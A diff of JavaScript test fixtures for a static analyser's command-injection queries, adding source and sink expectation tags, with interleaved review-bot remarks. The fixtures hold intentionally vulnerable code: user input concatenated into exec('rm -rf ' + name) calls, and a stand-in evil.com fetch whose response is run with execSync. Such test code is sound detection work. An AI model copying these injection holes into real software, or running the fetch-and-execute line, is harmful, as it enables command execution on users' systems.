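Review bot: The tag `// $ Sink Source` on `let cmd = url.parse(req.url, true).query.path;` in the first hunk marks the source statement itself as a sink, while the identical statement in the second `http.createServer` callback (next hunk, `@@ -63,14`) is tagged `// $ Source` only; if the first one is a sink because a call later in this file reports the definition of `cmd` as its sink location, a trailing remark such as `// $ Sink Source - sink reported at the definition of cmd` would keep the expectation readable. The same applies to `function run(cmd, args) { // $ Sink` in that next hunk, where the existing remark on the following line only explains the `// $ Alert` on `cp.spawn(cmd, args)`. This is inferred from the tags alone; the sink definition of the test query is not visible here.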
@@ -63,14 +63,14 @@ var server = http.createServer(function(req, res) { }); -function run(cmd, args) { +function run(cmd, args) { // $ Sink cp.spawn(cmd, args); // $ Alert - but note that the sink is where `args` is build. } var util = require("util") http.createServer(function(req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source util.promisify(cp.exec)(cmd); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js index b2cfe4424039..9e59ff90b140 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js @@ -12,10 +12,10 @@ function getShell() { function execSh(command, options) { var shell = getShell() - return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert + return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert Sink } http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source execSh(cmd); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js index 9d12f22bb249..5b6d770a2653 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js @@ -7,10 +7,10 @@ function getShell() { } function execSh(command, options) { - return cp.spawn(getShell(), ["-c", command], options) // $ Alert + return cp.spawn(getShell(), ["-c", command], options) // $ Alert Sink }; http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source execSh(cmd); }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js index 1cfc40856113..45f3e25a8971 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js @@ -15,6 +15,6 @@ function execEach(commands) { }; require('http').createServer(function(req, res) { - let cmd = require('url').parse(req.url, true).query.path; + let cmd = require('url').parse(req.url, true).query.path; // $ Source execEach([cmd]); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js index 0efc3279cf50..22ca9745c101 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js @@ -10,7 +10,7 @@ app.post('/profile', upload.single('avatar'), function (req, res, next) { }); app.post('/photos/upload', upload.array('photos', 12), function (req, res, next) { - req.files.forEach(file => { + req.files.forEach(file => { // $ Source exec("touch " + file.originalname); // $ Alert }) }); @@ -21,7 +21,7 @@ var Busboy = require('busboy'); http.createServer(function (req, res) { var busboy = new Busboy({ headers: req.headers }); - busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { + busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { // $ Source exec("touch " + filename); // $ Alert }); req.pipe(busboy); 
@@ -32,12 +32,12 @@ const formidable = require('formidable'); app.post('/api/upload', (req, res, next) => { let form = formidable({ multiples: true }); - form.parse(req, (err, fields, files) => { + form.parse(req, (err, fields, files) => { // $ Source exec("touch " + fields.name); // $ Alert }); let form2 = new formidable.IncomingForm(); - form2.parse(req, (err, fields, files) => { + form2.parse(req, (err, fields, files) => { // $ Source exec("touch " + fields.name); // $ Alert }); }); @@ -49,13 +49,13 @@ http.createServer(function (req, res) { // parse a file upload var form = new multiparty.Form(); - form.parse(req, function (err, fields, files) { + form.parse(req, function (err, fields, files) { // $ Source exec("touch " + fields.name); // $ Alert }); var form2 = new multiparty.Form(); - form2.on('part', function (part) { // / file / field + form2.on('part', function (part) { // $ Source - / file / field exec("touch " + part.filename); // $ Alert }); form2.parse(req); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js index a606c9166175..d4d4b36b674f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js @@ -2,7 +2,7 @@ var http = require("http"), url = require("url"); var server = http.createServer(function (req, res) { - let cmd = url.parse(req.url, true).query.path; + let cmd = url.parse(req.url, true).query.path; // $ Source require("cross-spawn").sync(cmd); // $ Alert require("execa").shell(cmd); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js index 16d91a4f6599..deb426291d6a 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/third-party-command-injection.js @@ -2,7 +2,7 @@ let https = require("https"), cp = require("child_process"); https.get("https://evil.com/getCommand", res => - res.on("data", command => { + res.on("data", command => { // $ Source cp.execSync(command); // $ Alert }) ); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js index 74301997e38c..021715395217 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js @@ -9,6 +9,6 @@ function test(e) { exec(e['GITHUB_ACTION']); } -test(process.env); +test(process.env); // $ Source exec(getInput('data')); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js index fd1e9cdd9f97..fe5142a0b3c8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js @@ -7,7 +7,7 @@ var cp = require("child_process"); cp.exec("cmd.sh " + process.argv[1]); cp.exec("cmd.sh " + process.argv[2]); // $ Alert - var args = process.argv.slice(2); + var args = process.argv.slice(2); // $ Source cp.execSync(args[0]); // $ Alert cp.execSync("cmd.sh " + args[0]); // $ Alert 
@@ -21,7 +21,7 @@ var cp = require("child_process"); }); (function() { - const args = process.argv.slice(2); + const args = process.argv.slice(2); // $ Source const script = path.join(packageDir, 'app', 'index.js'); cp.execSync(`node ${script} ${args[0]} --option"`); // $ Alert cp.execSync(`node ${script} ${args.join(' ')} --option"`); // $ Alert @@ -36,7 +36,7 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert var args = require('yargs') // eslint-disable-line .command('serve [port]', 'start the server', (yargs) => { }) .option('verbose', { foo: "bar" }) - .argv + .argv // $ Source cp.exec("cmd.sh " + args); // $ Alert @@ -47,15 +47,15 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert const { argv: { ...args - }, + }, // $ Source } = require('yargs') .usage('Usage: foo bar') .command(); cp.exec("cmd.sh " + args); // $ Alert - var tainted1 = require('yargs').argv; - var tainted2 = require('yargs').parse() + var tainted1 = require('yargs').argv; // $ Source + var tainted2 = require('yargs').parse() // $ Source const {taint1: {...taint1rest},taint2: {...taint2rest}} = { taint1: tainted1, @@ -65,15 +65,15 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert cp.exec("cmd.sh " + taint1rest); // $ Alert - has flow from tainted1 cp.exec("cmd.sh " + taint2rest); // $ Alert - has flow from tianted2 - var {...taint3} = require('yargs').argv; + var {...taint3} = require('yargs').argv; // $ Source cp.exec("cmd.sh " + taint3); // $ Alert - var [...taint4] = require('yargs').argv; + var [...taint4] = require('yargs').argv; // $ Source cp.exec("cmd.sh " + taint4); // $ Alert }); (function () { - const argv = process.argv.slice(2); + const argv = process.argv.slice(2); // $ Source var minimist = require("minimist"); cp.exec("cmd.sh " + minimist(argv).foo); // $ Alert 
@@ -85,10 +85,10 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // $ Alert import args from 'args' - var flags = args.parse(process.argv); + var flags = args.parse(process.argv); // $ Source cp.exec("cmd.sh " + flags.foo); // $ Alert - var flags = require('arg')({...spec}); + var flags = require('arg')({...spec}); // $ Source cp.exec("cmd.sh " + flags.foo); // $ Alert }) @@ -104,14 +104,14 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert (function () { const commandLineArgs = require('command-line-args'); - const options = commandLineArgs(optionDefinitions); + const options = commandLineArgs(optionDefinitions); // $ Source cp.exec("cmd.sh " + options.foo); // $ Alert }); (function () { const meow = require('meow'); - const cli = meow(`helpstring`, {flags: {...flags}}); + const cli = meow(`helpstring`, {flags: {...flags}}); // $ Source cp.exec("cmd.sh " + cli.input[0]); // $ Alert }); @@ -119,18 +119,18 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert (function () { var dashdash = require('dashdash'); - var opts = dashdash.parse({options: options}); + var opts = dashdash.parse({options: options}); // $ Source cp.exec("cmd.sh " + opts.foo); // $ Alert var parser = dashdash.createParser({options: options}); - var opts = parser.parse(); + var opts = parser.parse(); // $ Source cp.exec("cmd.sh " + opts.foo); // $ Alert }); (function () { - const { program } = require('commander'); + const { program } = require('commander'); // $ Source program.version('0.0.1'); cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js index 16ace6a020f6..b49d6b2bd73b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js @@ -3,14 +3,14 @@ const app = express(); const { execFile } = require("child_process"); app.get("/", (req, res) => { - const remote = req.query.remote; + const remote = req.query.remote; // $ Source execFile("git", ["ls-remote", remote]); // $ Alert execFile("git", ["fetch", remote]); // $ Alert indirect("git", ["ls-remote", remote]); // $ Alert - const myArgs = req.query.args; + const myArgs = req.query.args; // $ Source execFile("git", myArgs); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js index 5b58e1afe4f2..b4f75df03ac4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js @@ -2,6 +2,6 @@ const cp = require("child_process"); -module.exports.thisMethodIsImported = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.thisMethodIsImported = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index 77f49ad77017..85d0402a8ae8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js 
@@ -1,44 +1,44 @@ var cp = require("child_process") -module.exports.blah = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.blah = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink cp.execFile(name, [name]); cp.execFile(name, name); }; -module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.foo = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } -module.exports.foo.bar = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.foo.bar = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } function cla() { } -cla.prototype.method = function (name) { - cp.exec("rm -rf " + name); // $ Alert +cla.prototype.method = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } module.exports.cla = new cla(); function cla2() { } -cla2.prototype.method = function (name) { - cp.exec("rm -rf " + name); // $ Alert +cla2.prototype.method = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } module.exports.bla = new cla2(); module.exports.lib2 = require("./lib2.js") class Cla3 { - constructor(name) { - cp.exec("rm -rf " + name); // $ Alert + constructor(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } - static foo(name) { - cp.exec("rm -rf " + name); // $ Alert + static foo(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } - bar(name) { - cp.exec("rm -rf " + name); // $ Alert + bar(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink cp.exec("rm -rf " + notASource); } 
@@ -46,41 +46,41 @@ class Cla3 { module.exports.cla3 = Cla3; -module.exports.mz = function (name) { - require("mz/child_process").exec("rm -rf " + name); // $ Alert +module.exports.mz = function (name) { // $ Source + require("mz/child_process").exec("rm -rf " + name); // $ Alert Sink } -module.exports.flow = function (name) { - var cmd1 = "rm -rf " + name; // $ Alert +module.exports.flow = function (name) { // $ Source + var cmd1 = "rm -rf " + name; // $ Alert Sink cp.exec(cmd1); - var cmd2 = "rm -rf " + name; // $ Alert + var cmd2 = "rm -rf " + name; // $ Alert Sink function myExec(cmd) { cp.exec(cmd); } myExec(cmd2); } -module.exports.stringConcat = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.stringConcat = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink cp.exec(name); - cp.exec("for foo in (" + name + ") do bla end"); // $ Alert + cp.exec("for foo in (" + name + ") do bla end"); // $ Alert Sink - cp.exec("cat /foO/BAR/" + name) // $ Alert + cp.exec("cat /foO/BAR/" + name) // $ Alert Sink - cp.exec("cat \"" + name + "\"") // $ Alert + cp.exec("cat \"" + name + "\"") // $ Alert Sink - cp.exec("cat '" + name + "'") // $ Alert + cp.exec("cat '" + name + "'") // $ Alert Sink - cp.exec("cat '/foo/bar" + name + "'") // $ Alert + cp.exec("cat '/foo/bar" + name + "'") // $ Alert Sink cp.exec(name + " some file") } -module.exports.arrays = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.arrays = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var args1 = ["node"]; args1.push(name); // $ Alert @@ -94,7 +94,7 @@ module.exports.arrays = function (name) { } var util = require("util"); -module.exports.format = function (name) { +module.exports.format = function (name) { // $ Source cp.exec(util.format("rm -rf %s", name)); // $ Alert cp.exec(util.format("rm -rf '%s'", name)); // $ Alert 
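Review bot: In `module.exports.arrays` the `// $ Alert` on `args1.push(name);` and in `module.exports.format` the `// $ Alert` lines on `cp.exec(util.format("rm -rf %s", name));` are left without the new `Sink` tag, although every `"rm -rf " + name` alert in the same hunks now reads `// $ Alert Sink`; the same holds later in this file for `shellOption` (`cp.execFile("rm", ["-rf", name], {shell: true}, ...)`, `cp.spawn("rm", ["-rf", name], {shell: true})`), `check` (`path.join(config.installedPath, 'myBinary -v')`) and `shellThing` (`cp.spawn(cmd, args, spawnOpts)`). If the `Sink` tag is meant to cover only string-concatenation sinks this is fine, but it is not obvious from the file; a one-line comment near the top of lib.js, e.g. `// $ Sink is expected only for concatenation-based sinks; other sink kinds are checked via $ Alert alone`, would make the convention explicit. If instead those lines are supposed to carry `Sink` too, they are omissions. The query that produces the `Sink` tags is not visible here, so this is a hedged observation.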
@@ -108,8 +108,8 @@ module.exports.format = function (name) { cp.exec(require("printf")('rm -rf %s', name)); // $ Alert } -module.exports.valid = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.valid = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!isValidName(name)) { return; @@ -117,8 +117,8 @@ module.exports.valid = function (name) { cp.exec("rm -rf " + name); } -module.exports.safe = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.safe = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!isSafeName(name)) { return; @@ -127,8 +127,8 @@ module.exports.safe = function (name) { } class Cla4 { - wha(name) { - cp.exec("rm -rf " + name); // $ Alert + wha(name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink } static bla(name) { @@ -145,20 +145,20 @@ function Cla5(name) { } module.exports.cla5 = new Cla5(); -module.exports.indirect = function (name) { - let cmd = "rm -rf " + name; // $ Alert +module.exports.indirect = function (name) { // $ Source + let cmd = "rm -rf " + name; // $ Alert Sink let sh = "sh"; let args = ["-c", cmd]; cp.spawn(sh, args, cb); } -module.exports.indirect2 = function (name) { +module.exports.indirect2 = function (name) { // $ Source let cmd = name; let sh = "sh"; let args = ["-c", cmd]; cp.spawn(sh, args, cb); - let cmd2 = "rm -rf " + name; // $ Alert + let cmd2 = "rm -rf " + name; // $ Alert Sink var args2 = [cmd2]; cp.spawn( 'cmd.exe', 
@@ -167,65 +167,65 @@ module.exports.indirect2 = function (name) { ); } -module.exports.cmd = function (command, name) { +module.exports.cmd = function (command, name) { // $ Source cp.exec("fo | " + command); - cp.exec("fo | " + name); // $ Alert + cp.exec("fo | " + name); // $ Alert Sink } -module.exports.sanitizer = function (name) { +module.exports.sanitizer = function (name) { // $ Source var sanitized = "'" + name.replace(/'/g, "'\\''") + "'" cp.exec("rm -rf " + sanitized); - var broken = "'" + name.replace(/'/g, "'\''") + "'" // $ Alert - cp.exec("rm -rf " + broken); // $ Alert + var broken = "'" + name.replace(/'/g, "'\''") + "'" // $ Alert Sink + cp.exec("rm -rf " + broken); // $ Alert Sink } var path = require("path"); -module.exports.guard = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.guard = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!path.exist(name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink return; } cp.exec("rm -rf " + name); } -module.exports.blacklistOfChars = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.blacklistOfChars = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (/[^A-Za-z0-9_\/:=-]/.test(name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } } -module.exports.whitelistOfChars = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.whitelistOfChars = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (/^[A-Za-z0-9_\/:=-]$/.test(name)) { cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.blackList2 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.blackList2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if 
(!/^([a-zA-Z0-9]+))?$/.test(name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink process.exit(-1); } - cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to tracking flow through `process.exit()`. + cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to tracking flow through `process.exit()`. } -module.exports.accessSync = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.accessSync = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink try { path.accessSync(name); @@ -233,7 +233,7 @@ module.exports.accessSync = function (name) { return; } - cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer. + cp.exec("rm -rf " + name); // $ Sink SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer. } var cleanInput = function (s) { 
@@ -245,27 +245,27 @@ var cleanInput = function (s) { return s; } -module.exports.goodSanitizer = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.goodSanitizer = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var cleaned = cleanInput(name); - cp.exec("rm -rf " + cleaned); // $ SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node. + cp.exec("rm -rf " + cleaned); // $ Sink SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node. } var fs = require("fs"); -module.exports.guard2 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.guard2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (!fs.existsSync("prefix/" + name)) { - cp.exec("rm -rf prefix/" + name); // $ Alert + cp.exec("rm -rf prefix/" + name); // $ Alert Sink return; } cp.exec("rm -rf prefix/" + name); } -module.exports.sanitizerProperty = function (obj) { - cp.exec("rm -rf " + obj.version); // $ Alert +module.exports.sanitizerProperty = function (obj) { // $ Source + cp.exec("rm -rf " + obj.version); // $ Alert Sink obj.version = ""; @@ -273,12 +273,12 @@ module.exports.sanitizerProperty = function (obj) { } module.exports.Foo = class Foo { - start(opts) { - cp.exec("rm -rf " + opts.bla); // $ Alert + start(opts) { // $ Source + cp.exec("rm -rf " + opts.bla); // $ Alert Sink this.opts = {}; this.opts.bla = opts.bla - cp.exec("rm -rf " + this.opts.bla); // $ Alert + cp.exec("rm -rf " + this.opts.bla); // $ Alert Sink } } 
@@ -304,25 +304,25 @@ function sanitizeShellString(str) { return result } -module.exports.sanitizer2 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.sanitizer2 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var sanitized = sanitizeShellString(name); cp.exec("rm -rf " + sanitized); } -module.exports.typeofcheck = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.typeofcheck = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (typeof name === "undefined") { cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.typeofcheck = function (arg) { - var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert +module.exports.typeofcheck = function (arg) { // $ Source + var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert Sink cp.exec(cmd); } @@ -336,8 +336,8 @@ module.exports.unproblematic = function() { cp.exec("rm -rf " + id("test")); }; -module.exports.problematic = function(n) { - cp.exec("rm -rf " + id(n)); // $ Alert +module.exports.problematic = function(n) { // $ Source + cp.exec("rm -rf " + id(n)); // $ Alert Sink }; module.exports.typeofNumber = function(n) { @@ -346,9 +346,9 @@ module.exports.typeofNumber = function(n) { } }; -function boundProblem(safe, unsafe) { +function boundProblem(safe, unsafe) { // $ Source cp.exec("rm -rf " + safe); - cp.exec("rm -rf " + unsafe); // $ Alert + cp.exec("rm -rf " + unsafe); // $ Alert Sink } Object.defineProperty(module.exports, "boundProblem", { @@ -402,8 +402,8 @@ function yetAnohterSanitizer(str) { return result; } -module.exports.sanitizer3 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.sanitizer3 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink var sanitized = yetAnohterSanitizer(name); cp.exec("rm -rf " + sanitized); 
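Review bot: `module.exports.typeofcheck` is assigned twice in this hunk: `module.exports.typeofcheck = function (name) { // $ Source` and, a few lines later, `module.exports.typeofcheck = function (arg) { // $ Source`, so the second assignment overwrites the first at runtime and two distinct test cases share one export name. The expectations presumably still hold because each assignment to `module.exports` is treated as an exported function by the analysis, but the duplicate name makes the expected-output file harder to read and is easy to mistake for a copy-paste error; renaming the second to `module.exports.typeofcheck2 = function (arg) { // $ Source` would remove the ambiguity without changing what is tested. The pre-existing duplicate is touched by this commit only to add the `// $ Source` tag.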
@@ -411,8 +411,8 @@ module.exports.sanitizer3 = function (name) { const cp = require("child_process"); const spawn = cp.spawn; -module.exports.shellOption = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.shellOption = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // $ Alert cp.spawn("rm", ["-rf", name], {shell: true}); // $ Alert @@ -438,13 +438,13 @@ function build(first, last) { }; var asyncExec = require("async-execute"); -module.exports.asyncStuff = function (name) { - asyncExec("rm -rf " + name); // $ Alert +module.exports.asyncStuff = function (name) { // $ Source + asyncExec("rm -rf " + name); // $ Alert Sink } const myFuncs = { - myFunc: function (name) { - asyncExec("rm -rf " + name); // $ Alert + myFunc: function (name) { // $ Source + asyncExec("rm -rf " + name); // $ Alert Sink } }; @@ -474,13 +474,13 @@ const {promisify} = require('util'); const exec = promisify(require('child_process').exec); -module.exports.check = function check(config) { +module.exports.check = function check(config) { // $ Source const cmd = path.join(config.installedPath, 'myBinary -v'); // $ Alert return exec(cmd); } -module.exports.splitConcat = function (name) { - let args = ' my name is ' + name; // $ Alert +module.exports.splitConcat = function (name) { // $ Source + let args = ' my name is ' + name; // $ Alert Sink let cmd = 'echo'; cp.exec(cmd + args); } @@ -495,8 +495,8 @@ module.exports.myCommand = function (myCommand) { cp: require('child_process') }; - module.exports.myIndirectThing = function (name) { - MyThing.cp.exec("rm -rf " + name); // $ Alert + module.exports.myIndirectThing = function (name) { // $ Source + MyThing.cp.exec("rm -rf " + name); // $ Alert Sink } }); 
@@ -506,48 +506,48 @@ for (var name in imp){ module.exports[name] = imp[name]; } -module.exports.sanitizer4 = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.sanitizer4 = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (isNaN(name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(parseInt(name))) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(+name)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(parseInt(name, 10))) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(name - 0)) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { cp.exec("rm -rf " + name); } if (isNaN(name | 0)) { // <- not a sanitizer - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } else { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } } -module.exports.shellThing = function (name) { +module.exports.shellThing = function (name) { // $ Source function indirectShell(cmd, args, spawnOpts) { cp.spawn(cmd, args, spawnOpts); // $ Alert } 
@@ -555,28 +555,28 @@ module.exports.shellThing = function (name) { indirectShell("rm", ["-rf", name], {shell: true}); // $ Alert } -module.exports.badSanitizer = function (name) { +module.exports.badSanitizer = function (name) { // $ Source if (!name.match(/^(.|\.){1,64}$/)) { // <- bad sanitizer - exec("rm -rf " + name); // $ Alert + exec("rm -rf " + name); // $ Alert Sink } else { - exec("rm -rf " + name); // $ Alert + exec("rm -rf " + name); // $ Alert Sink } if (!name.match(/^\w{1,64}$/)) { // <- good sanitizer - exec("rm -rf " + name); // $ Alert + exec("rm -rf " + name); // $ Alert Sink } else { exec("rm -rf " + name); } } -module.exports.safeWithBool = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.safeWithBool = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (isSafeName(name)) { cp.exec("rm -rf " + name); } - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink if (isSafeName(name) === true) { cp.exec("rm -rf " + name); @@ -587,10 +587,10 @@ module.exports.safeWithBool = function (name) { } if (isSafeName(name) == false) { - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } - cp.exec("rm -rf " + name); // $ Alert + cp.exec("rm -rf " + name); // $ Alert Sink } function indirectThing(name) { @@ -605,8 +605,8 @@ function moreIndirect(name) { return indirectThing2(name) !== false; } -module.exports.veryIndeirect = function (name) { - cp.exec("rm -rf " + name); // $ Alert +module.exports.veryIndeirect = function (name) { // $ Source + cp.exec("rm -rf " + name); // $ Alert Sink if (indirectThing(name)) { cp.exec("rm -rf " + name); 
